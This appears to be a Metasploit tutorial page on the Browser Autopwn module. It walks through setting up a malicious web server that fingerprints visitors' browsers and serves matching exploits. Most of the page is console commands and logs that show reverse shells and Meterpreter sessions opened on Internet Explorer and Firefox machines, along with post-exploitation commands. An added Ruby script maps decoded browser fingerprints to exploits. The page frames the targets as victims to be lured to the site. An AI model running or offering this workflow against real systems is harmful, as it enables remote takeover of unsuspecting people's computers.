Browser Autopwn
At DEFCON 17, Metasploit developer Egypt unveiled Browser Autopwn for MSF. This new module fingerprints the victim's browser before launching exploits at it, so if the remote PC is running Internet Explorer 6, it will not waste IE7 exploits on it. The slide deck for Egypt's presentation is available for your reading pleasure at http://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-egypt-guided_missiles_metasploit.pdf.

The setup for the 'server/browser_autopwn' module is extremely simple, as shown below.
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    192.168.1.101    yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set uripath /
uripath => /
msf auxiliary(browser_autopwn) >

That's really all there is to the required configuration. Setting URIPATH to / makes the root of the server the fingerprinting page, and LHOST must be an address the victim can reach, since it is baked into every reverse-connect payload. Now let's run it and see what it does.
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.1.101...
[*] ---
...snip...
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/zCtg7oC
[*] Local IP: http://192.168.1.101:8080/zCtg7oC
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/vTNGJx
[*] Local IP: http://192.168.1.101:8080/vTNGJx
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7
[*] Local IP: http://192.168.1.101:8080/abmR33jxStsF7
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
...snip...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV
[*] Local IP: http://192.168.1.101:8080/RdDDhKANpV
[*] Server started.
[*] --- Done, found 11 exploit modules
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.
Now all we need to do is get some poor victim to navigate to our malicious website. When they do, the page fingerprints their browser with JavaScript, reports the result back in the sessid parameter, and Browser Autopwn serves only the exploits that match that browser and version.
[*] Request '/' from 192.168.1.128:1767
[*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo=' from 192.168.1.128:1767
[*] JavaScript Report: Windows:XP:undefined:en-us:x86:MSIE:6.0;SP2:
[*] No database, using targetcache instead
[*] Responding with exploits
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.1.128:1774...
[*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.1.128:1775...
[*] Sending Microsoft Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.128:1774...
[*] Sending EXE payload to 192.168.1.128:1775...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:62360 -> 192.168.1.128:1798)
msf auxiliary(browser_autopwn) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.101:62360 -> 192.168.1.128:1798
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: XP-SP2-BARE
OS : Windows XP (Build 2600, Service Pack 2).
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:41:f2:e8
IP Address : 192.168.1.128
Netmask : 255.255.0.0
meterpreter >

Very slick operation! And it's not limited to Internet Explorer. Even Firefox can be abused.
[*] Request '/' from 192.168.1.112:1122
[*] Request '/?sessid=V2luZG93czpYUDp1bmRlZmluZWQ6ZnItRlI6eDg2OkZpcmVmb3g6MTo=' from 192.168.1.112:1122
[*] JavaScript Report: Windows:XP:undefined:fr-FR:x86:Firefox:1:
[*] No database, using targetcache instead
[*] Responding with exploits
[*] Request '/favicon.ico' from 192.168.1.112:1123
[*] 404ing /favicon.ico
[*] Sending Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution to 192.168.1.112:1124...
[*] Sending Mozilla Suite/Firefox Navigator Object Code Execution to 192.168.1.112:1125...
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.112:1123...
[*] Sending Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution to 192.168.1.112:1125...
[*] Command shell session 3 opened (192.168.1.101:56443 -> 192.168.1.112:1126)
msf auxiliary(browser_autopwn) > sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\Mozilla Firefox>hostname
hostname
dookie-fa154354
C:\Program Files\Mozilla Firefox>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : dookie
IP Address. . . . . . . . . . . . : 192.168.1.112
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 192.168.1.1
C:\Program Files\Mozilla Firefox> 
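The fingerprint-to-exploit matching that the two request logs above illustrate, as an added Ruby example that is not part of this page or of the Metasploit module itself: it decodes the sessid parameter from the two requests shown (the base64 value that the JavaScript Report lines display decoded), splits the colon-delimited report into fields, rejects anything that is not a well-formed report, and filters a target table by OS, browser and major version. The field names and the version constraints in the table are assumptions for illustration, not the module's real target cache; the module's own matching is looser, as the Firefox run above shows, where a Firefox 1 client was also sent the Firefox 3.5 escape() exploit.

```ruby
require 'base64'

# Constructed sample inputs: the two sessid values that appear in the
# request log excerpts above (IE 6 on XP SP2, and French-locale Firefox 1).
SESSID_IE6     = 'V2luZG93czpYUDp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo='
SESSID_FIREFOX = 'V2luZG93czpYUDp1bmRlZmluZWQ6ZnItRlI6eDg2OkZpcmVmb3g6MTo='

# Field names are an assumption about the colon-delimited layout visible in
# the decoded "JavaScript Report" lines: os:flavor:sp:lang:arch:browser:version:
Fingerprint = Struct.new(:os_name, :os_flavor, :os_sp, :os_lang, :arch, :ua_name, :ua_ver) do
  # Leading integer of the browser version: "6.0;SP2" -> 6, "1" -> 1, "" -> nil
  def ua_major
    m = ua_ver[/\A\d+/]
    m && m.to_i
  end
end

# Turn the sessid query parameter back into a Fingerprint. strict_decode64
# raises ArgumentError on malformed base64; we raise the same for a report
# that does not have the seven fields plus trailing colon seen in the log.
def decode_sessid(sessid)
  report = Base64.strict_decode64(sessid)
  fields = report.split(':', -1)
  unless fields.length == 8 && fields.last.empty?
    raise ArgumentError, "unexpected report layout: #{report.inspect}"
  end
  Fingerprint.new(*fields[0, 7])
end

# Constructed target table. The exploit titles and module names are the ones
# the log above shows being started or sent; the OS/browser/version
# constraints are assumed for illustration and are NOT the module's real
# target cache.
TARGETS = [
  { name: 'Internet Explorer COM CreateObject Code Execution',
    os: 'Windows', ua: 'MSIE',    ua_major: 5..6 },
  { name: 'Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow',
    os: 'Windows', ua: 'MSIE',    ua_major: 6..6 },
  { name: 'Microsoft Internet Explorer Data Binding Memory Corruption',
    os: 'Windows', ua: 'MSIE',    ua_major: 6..7 },
  { name: 'multi/browser/mozilla_compareto',
    os: nil,       ua: 'Firefox', ua_major: 1..1 },
  { name: 'multi/browser/mozilla_navigatorjava',
    os: nil,       ua: 'Firefox', ua_major: 1..1 },
  { name: 'multi/browser/firefox_escape_retval',
    os: nil,       ua: 'Firefox', ua_major: 3..3 },
  { name: 'multi/browser/opera_configoverwrite',
    os: nil,       ua: 'Opera',   ua_major: nil },   # nil = any version
]

# Return the names of the targets whose constraints the fingerprint satisfies.
# A nil :os means "any OS"; a nil :ua_major means "any version"; a browser
# whose version could not be parsed only matches unconstrained entries.
def select_exploits(fp, targets = TARGETS)
  targets.select do |t|
    next false if t[:os] && t[:os] != fp.os_name
    next false if t[:ua] != fp.ua_name
    next true if t[:ua_major].nil?
    major = fp.ua_major
    !major.nil? && t[:ua_major].cover?(major)
  end.map { |t| t[:name] }
end

if __FILE__ == $PROGRAM_NAME
  [SESSID_IE6, SESSID_FIREFOX].each do |sid|
    fp = decode_sessid(sid)
    puts "#{fp.ua_name} #{fp.ua_ver} on #{fp.os_name} #{fp.os_flavor} (#{fp.os_lang})"
    select_exploits(fp).each { |name| puts "  -> #{name}" }
  end
end
```

Run it directly to see the two fingerprints decoded and the exploits each one would receive. The strict layout check matters because the sessid value arrives from the client: anything that is not valid base64, or that does not decode to the seven-field report, is refused rather than fed into the matching logic.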
